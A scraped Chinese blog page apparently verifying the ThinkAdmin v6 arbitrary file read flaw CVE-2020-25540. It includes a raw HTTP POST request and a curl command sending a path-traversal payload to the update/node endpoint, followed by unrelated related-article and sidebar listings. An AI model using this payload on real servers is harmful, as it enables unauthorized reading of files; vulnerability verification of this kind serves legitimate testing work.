Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)漏洞验证

先使用了burp,发现回不来

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 28rules=%5b%22..%2f..%2f%22%5d


使用curl去返回数据包,也无

curl https://xxxxx/admin.html?s=admin/api.Update/node -X POST -d 'rules=%5B%22.%2F%22%5D'


最后用了浏览器

Thinkadmin v6爆高危漏洞!相关推荐

  1. 以太坊再爆高危漏洞!黑客增发ATN 1100万枚token事件始末

    以太坊再爆高危漏洞!黑客增发ATN 1100万枚token事件始末 编者按:5月11日,ATN Token遭受恶意攻击,攻击者利用DSAuth库与ERC223搭配使用具有的混合漏洞,窃取了ATN的所有 ...

  2. 小心!智能合约再爆高危漏洞,两大加密货币直接变废纸!

    小心!智能合约再爆高危漏洞,两大加密货币直接变废纸! 大家都还记得,前一段时间发生的BEC智能合约的安全漏洞问题.近日,智能合约安全问题再次上演,火币Pro发布公告,暂停EDU冲提币业务,随后EDU智 ...

  3. Android 爆高危漏洞,华为小米皆中招;第三代苹果 AirPods 来了;SQLite 3.30.0 发布 | 极客头条...

    快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道.风里雨里,我们将每天为朋友们,播报最新鲜有 ...

  4. 【黑鸟安全预警与每日资源】S2-048!Struts2 再爆高危漏洞!

    [黑鸟安全预警]S2-048!Struts2 再爆高危漏洞!目前POC已公开,请各单位检查自己的应用是否有使用了Struts2 Struts1的插件!若使用了该插件会导致不受信任的输入传入到 Acti ...

  5. 突发!Spring Cloud 爆高危漏洞。。赶紧修复!!

    Spring Cloud 突发漏洞 Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得折腾了... 2022年3月1日,Spring官方发布了关于Sp ...

  6. Spring Cloud 爆高危漏洞!!!

    今日推荐 最适合晚上睡不着看的 8 个网站,建议收藏哦 23 种设计模式的通俗解释,虽然有点污,但是秒懂请立即卸载这款 IDEA 插件!SQL自动检查神器,再也不用担心SQL出错了,自动补全.回滚等功 ...

  7. Struts 2再爆高危漏洞CVE-2017-5638 绿盟科技发布免费扫描工具及产品升级包

    Apache Structs2的Jakarta Multipart parser插件存在远程代码执行漏洞,漏洞编号为CVE-2017-5638.cwiki.apache.org公告了这个信息. 绿盟科 ...

  8. 微软服务器最大漏洞,微软又爆高危漏洞,小心电脑被远程控制!

    [漏洞说明] 2020年3月12日,微软安全中心在3月份例行安全更新之后,单独发布Windows SMBv3 客户端/服务器远程代码执行漏洞(CVE-2020-0796)补丁程序,公告指出该漏洞存在于 ...

  9. 博览安全圈:360曝Office高危漏洞 微软及时修复

    为了响应国家号召,加强全民网络安全意识,我们会经常性的为大家奉上最具代表性的安全事件. 1.360曝光Office高危漏洞 微软及时发布安全更新 近日,360称发现了Office的高危漏洞(CVE-2 ...

最新文章

  1. echo等追加到文件末尾
  2. mysql 平均日营业额_一条SQL语句中算日销售额和月销售额
  3. mysql now str,数据库学习之MySQL (十)—— 日期和时间函数 NOW STR_TO_DATE DATE_FORMAT 流程控制函数 IF IFNULL CASE...
  4. html标签之img,input标签
  5. 计组之存储系统:7、Cache替换算法(随机算法RAND、先进先出算法FIFO、近期最少使用LRU、最近不经常使用LFU)
  6. 使用Android OpenGL ES 2.0绘图之三:绘制形状
  7. iphone app开发实战很重要:《iPhone App开发实战手册》读后感
  8. Oracle认证/维保技术支持服务找重庆思庄
  9. Win10如何彻底删除360的办法
  10. 056 CSRF跨站请求伪造
  11. 北航计算机组成原理课程设计-2021秋 PreProject-MIPS-入门简介
  12. Java Web实训项目:西蒙购物网1
  13. Centos7 搭建 Svn+ReviewBoard
  14. 什么是TensorFlow
  15. win7计算机内存占用高,win7降低电脑内存占用过高的方法
  16. MYSQL 列转行方法
  17. 王选: 从Dijkstra谈帅才的洞察力
  18. 造梦师的梦想是什么样的?
  19. RT-Thread驱动——RTC PCF8563
  20. Android中的指纹识别

热门文章

  1. uniapp 获取android设备 GPS 信号强弱
  2. 【Android学习之路】之从零开始做一个小项目(一)
  3. 从排名看主流半导体厂商在3G市场的策略与心态
  4. Json简介与基本使用
  5. matlab重叠保留法,【matlab实现】重叠相加法与重叠保留法
  6. Mac版 Adobe PS CC 2019 安装教程
  7. pc端怎么发微信朋友圈(有照片的)?
  8. Windows 10使用HDD硬盘出现占用率100%造成卡机假死的解决方法
  9. 网易手游《镇魔曲》怎么打?华为畅享6S帮你春节同学聚会露一手
  10. MacOS安装brew安装git安装sdkman安装sbt